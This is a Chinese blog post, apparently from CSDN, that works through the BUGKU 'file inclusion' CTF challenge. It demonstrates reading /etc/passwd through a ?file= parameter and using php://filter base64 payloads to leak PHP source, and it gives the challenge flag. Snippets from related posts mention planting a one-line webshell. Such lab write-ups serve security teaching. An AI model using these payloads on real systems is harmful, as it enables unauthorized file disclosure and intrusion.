BUGKU-文件包含-WriteUP

最新推荐文章于 2024-07-30 14:59:55 发布
最新推荐文章于 2024-07-30 14:59:55 发布
阅读量239 收藏
点赞数
文章标签: php 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26012889/article/details/130499802
版权

在这里插入图片描述
打开题目让点击链接
在这里插入图片描述
既然提示了文件包含,又看到*.php?file=这种格式就往伪协议上考虑。

关于PHP伪协议知识可以在这里补充
https://blog.csdn.net/cosmoslin/article/details/120695429

先测试看下?file=/etc/passwd
在这里插入图片描述
这里没有进行过滤可以直接读出来。
那么目前知道了是伪协议文件包含读文件接下来就要确定flag的目录了
这个可以上目录扫描看下,我没有这么做,试了几个简单的flag.php,/flag.php 然后就试出来了 /flag
在这里插入图片描述
当然这样直接猜目录还是靠运气,既然考伪协议,那么我们试着读一下这个index.php、show.php
构造也很简单,使用php://filter/resource=index.php 就表示使用伪协议读index.php那么payload就是

http://xxxx/index.php?file=php://filter/resource=index.php

在这里插入图片描述

http://xxxxx/index.php?file=php://filter/resource=show.php

在这里插入图片描述
可以看到这里直接执行了php,想看文件内容我们可以添加这个参数read=convert.base64-encode使用base64编码输出。
那么payload就是这样

http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=show.php

在这里插入图片描述
base64解一下
index.php
在这里插入图片描述
show.php(其实这个show.php就是个提示,提示flag在index.php中)
在这里插入图片描述
那么到此这题就解出来了
flag:flag{c10e8c4f0c1cab878bf0a61166a43524}
总结:
1.看到?file=的包含先用常见的目录尝试猜测,往往事半功倍。
2.伪协议读文件可以提供下一步的思路

h88z
关注
BugKu_文件包含
Kobalos的博客
08-06 351
直接访问目标地址 发现有一个跳转链接,点击尝试,发现跳转到/index.php?file=show.php 看他的url还有题目名字,确定这里应该就是文件包含的漏洞点了 CTF中经常使用的是php://filter和php://input php://filter 用于读取源码 php://input 用于执行php代码 php://filter/read=convert.base64-encode/resource=[文件名] 用于读取文件.
bugku-writeup-web-文件包含
热门推荐
dark的博客
06-14 1万+
bugku-web13解题思路记录。” 题目:click me? no
Bugku-文件包含
qq_56611811的博客
05-16 246
得到flag{f285b417425153e41a60b28032c76395}file=show.php。试试能不能回到上级目录。
BUGKU-WEB-文件包含
最新发布
m0_52484587的博客
07-30 715
convert.base64-encode:是一个过滤器,看到encode可以知道这是一个加密的过滤,那自然就有convert.base64-decode,解密了。可以看到,说是这个参数可以不选,在PHP伪协议中,read是一个用于读取文件内容的操作符。如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。read操作符将返回指定长度的文件内容。
bugku文件包含
qq_62046696的博客
04-30 999
因为时文件包含的题目,首先尝试一下file=index.php,发现出现了报错信息。然后考虑用伪协议绕过一下 1.file=php://input仍然出现了报错信息,然后用一下其他的伪协议 2.file=php://filter/read=convert.base64-encode/resource=./index.php 得到base64加密的编码,通过base64解码就可以获取flag ...
Bugku文件包含
金 帛的博客
02-15 808
BugkuWP
BUGKU-WEB 文件包含
天泽岁月
02-22 1407
BUGKU-WEB 文件包含PHP伪协议
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3345
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
bugku-代码审计 writeup
Peithon的博客
04-29 6084
代码审计 在做bugku 代码审计的题时,发现有好多函数的绕过是之前没留意到的,记录一下 1.extract变量覆盖 题目地址:http://120.24.86.145:9009/1.php <?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)...
BUGKU-WEB
wojiushilsy的博客
02-22 520
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
BUGKU-杂项
wojiushilsy的博客
02-09 2149
1.这是一张单纯的图片 2.隐写 3.telnet 4.眼见非实(ISCCCTF) 5.啊哒 6.又一张图片,还单纯吗 7.猜 8.宽带信息泄露 9.隐写2 10.多种方法解决 11.闪的好快 12.come_game 13.白哥的鸽子 14.linux 15.隐写3 16.做个游戏(08067CTF) 17.想蹭网先解开密码 18.Linux2 19.账号被盗了 20.细心的大象 21.爆照(0...
bugku--文件包含
qq_51802152的博客
12-14 520
bugku--文件包含
bugku 文件包含
weixin_74020633的博客
09-27 278
点击后,跳转到一个index页面,并且url后有flag=show.php,根据搜索知道这是典型的文件包含问题(虽然这里题目提示是文件包含了)之后尝试改为flag=index,发现不对。在开发过程中,当频繁需要跳转网页,或者需要某个函数时,程序员喜欢将重复的函数写道一个单独的文件中,在需要时调用文件,这种文件调用叫做文件包含。当调用的不是函数,而是一个文件时,就相当于把这个文件变了变量,也就给了用户操控参数的机会,就可能造成文件包含漏洞。通常获取源代码时,伪协议将xxx.php当文件执行,
文件包含-BugkuCTF
yuqie的博客
06-05 179
flag也藏在其中!
[bugku]-文件包含2
weixin_52116519的博客
03-31 1042
考点:通过文件包含的方式读取其他目录下的文件按 1、查看源码,发现hint 2、文件上传点 3、上传1.png文件,抓包,修改内容为一句话木马 4、访问上传文件名,发现有过滤 5、绕过过滤,上传一句话木马 6、访问上传文件名,输出a,说明上传成功。接着getshell即可。 ...
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 2733
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
Bugku 文件包含
qq_52718293的博客
10-23 140
这题提示了是文件包含,利用php为协议读取文件就好,然后百度一下(推荐这个文),然后选用这个 http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码) 然后拿到base64一下 ok了 ...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值